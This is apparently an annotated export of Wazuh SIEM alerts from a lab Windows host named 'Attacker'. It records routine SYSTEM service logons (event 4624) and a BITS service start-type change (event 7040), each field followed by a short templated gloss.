data.win.system.threadID: 10144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.161563 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:44:30.2946918Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2922 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13636 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.163375 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:48:03.2396185Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43492 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.170713 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:16.7140388Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43494 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.178051 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:25.8978248Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43496 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533893.185389 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:29.1249111Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43498 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533894.192727 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
